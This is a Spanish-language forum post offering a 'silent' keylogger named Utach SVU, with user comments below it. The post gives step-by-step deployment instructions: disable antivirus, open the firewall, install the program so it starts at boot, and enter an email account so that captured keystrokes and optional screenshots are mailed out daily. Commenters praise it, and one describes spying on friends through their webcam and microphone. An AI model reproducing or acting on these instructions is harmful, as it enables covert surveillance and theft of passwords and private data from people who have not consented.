Utach SVU - Keylogger silencioso y simple

Utach SVU KeyLogger C BETA 1

Con este sencillo pero potente keylogger puedes capturar las teclas y hacer capturas de pantalla de un equipo huesped, y enviarlo por email cada 24hs.

Instrucciones de uso

IMPORTANTE: Se recomienda desactivar los antivirus y abrir el Firewall de Windows antes de instalar.

Instalar el ejecutable svugen_C.exe en el equipo huesped, el directorio de instalación predeterminado (y recomendable)
es C:UsersPublicSVUGen (en Windows 8 y posterior)

Una vez que se instala, el programa funciona automáticamente, y se iniciará cada vez que se encienda la computadora.

Una vez en el directorio de instalación, editar el archivo correo.txt, se debe agregar en la primera línea una cuenta de correo electrónico
en la segunda linea la contraseña, quedando de ejemplo.

[email protected]
contraseña123

IMPORTANTE: Se recomienda usar una cuenta de correo creada solamente para ese propósito, de momento solo solamente soporta cuentas Yahoo.

En el archivo config.txt se podrá configurar si se desea realizar una captura de pantalla de la computadora cada media hora.
Los comandos son los siguientes capture=true o capture=false, preconfigurado a capture=false (desactivado).

Una vez instalado este software en el equipo, todos los días se enviará por correo las teclas que se presionan por día
(y si está activado también las capturas de pantalla).

Cada día se van guardando en la PC huesped los datos (capturas y teclas) en el directorio history.

Utach SVU - Keylogger silencioso y simple
20 Puntos Score: 10/10
Visitas: 2452 Favoritos: 15
Ver los usuarios que votaron...
10 Comentarios Utach SVU - Keylogger silencioso y simple
Gracias por compartir!!!!  
Cita anonimo55: Mostrar
Gracias amigo  
@larylucky
No podrias hacer un tuto  
salu2  
es un gran aporte si pudiera te dejara puntos pero no tengo
Aun asi gracias por el aporte
Gracias compa?
Cita shenmue2: Mostrar
yo tenia un programa que era similar, solo que remotamente yo podia activar la camara web si no la usaban claro, y activar el microfono, podia ver lo que hacian y en una ventana cmd me aparecia lo que tecleaban, podia desactivar que escribieran y escribir yo jajajaja era rebueno ese programa, consegui uno similar pero no lo pude configurar,
igual este haber que mas bromas les hago a mis amistades jijijijiji  
descargando a ver q tal
voy a probarlo, se te agradece amigo
copi paste, no sirve esta babosada
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!